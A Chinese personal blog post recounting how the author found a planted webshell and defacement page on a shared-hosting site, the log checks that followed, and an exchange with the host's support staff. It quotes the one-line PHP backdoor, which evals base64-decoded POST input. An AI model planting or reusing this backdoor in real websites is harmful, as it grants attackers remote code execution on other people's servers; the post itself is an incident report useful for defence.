昨天倒腾网站的时候,发现根目录有奇怪的文件夹,一个fans.php一个gh.html,当时就尿了。。。
文件都没删,只是一句话的php标签删掉了,页子的图片链接删掉了


查了查最后修改时间前后的原始访问log,什么都没查到,也就是说文件出现的时候cpanel的log里什么都没记录,其实到这里应该就知道是服务器出问题了的,没想太多,就接着查。

  • fans.php的一句话,可以在国内某论坛查到原型
    $mujj=$_POST['RRRR'];if($mujj!=''){$xsser=base64_decode($_POST['z0']);@eval("\$safedg=$xsser;");}
  • 查fans.php的访问记录,查不到
  • 查gh.html的访问记录,查到的都是外国ip
  • 查留言里有没有xss,没查到
  • 访问记录查xss,查到了一个尝试在serach参数跨站的记录,可是时间对不上,在文件中搜索对应语句找不到
  • 下载整站备份,用vscode查关键字有没有其他隐藏shell,没找到@@当时我是蒙比的@@

在千里码群里找到了elf,结果发现应该是服务器被搞了
www.zone-h.org/archive/ip=122.10.90.178

这下我就放心了,因为我也无能为力啊,把程序和数据库down了一份,愿意怎么搞怎么搞吧,我备份好了等运营商补窟窿


与空间商“技术人员”的对话

我:

可以看到我当前所在主机大量网站存在相同黑页
http://www.zone-h.org/archive/ip=122.10.90.178

我于昨天发现根目录存在木马文件和黑页
名字为
https://moozik.cn/fans.php 最后修改日期2017-04-28 17:51
https://moozik.cn/gh.html 最后修改日期2017-4-24 04:37

但是去cpanel查看日期前后访问记录,发现完全没有记录,而且fans.php一次访问记录也没有

请检查服务器补丁情况,和网段内异常主机,多谢!多谢!


技术人员:

您好
:)
你网站被入侵
如果 你网站只是放个index.html单页 你可以看看
会被入侵么。
用户和用户之间 都是 suphp 独立的权限。
服务器没有任何安全问题。
你自己可以通过 360网站扫描检查工具。


我:
我麻烦你看看那个链接,同一天同一个ip上的不同站点,用着不同程序的20个站都被挂了相同的gh.html页面,你跟我说是我一个个例??

那你告诉我为什么那个文件的最后访问时间前后cpanel里的log根本就没有访问记录
那就说明根本不是从php这里改的文件

我不是在质疑你们的服务器不安全,也没有兴师问罪,只是想请你们本着为客户负责的精神检查一下,有那么难吗


后续

2017-05-02
一个朋友在我的推荐下用了我所用的主机,然而今天整个主机挂了,没错,我反查了一下,挂了27个域名的主机,ping不通,所有网站打不开。
QQ截图20170502174527.jpg

具体这个错误代表了什么我不是特别清楚,看看大牛怎么说。

最后修改:2018 年 02 月 28 日 05 : 40 PM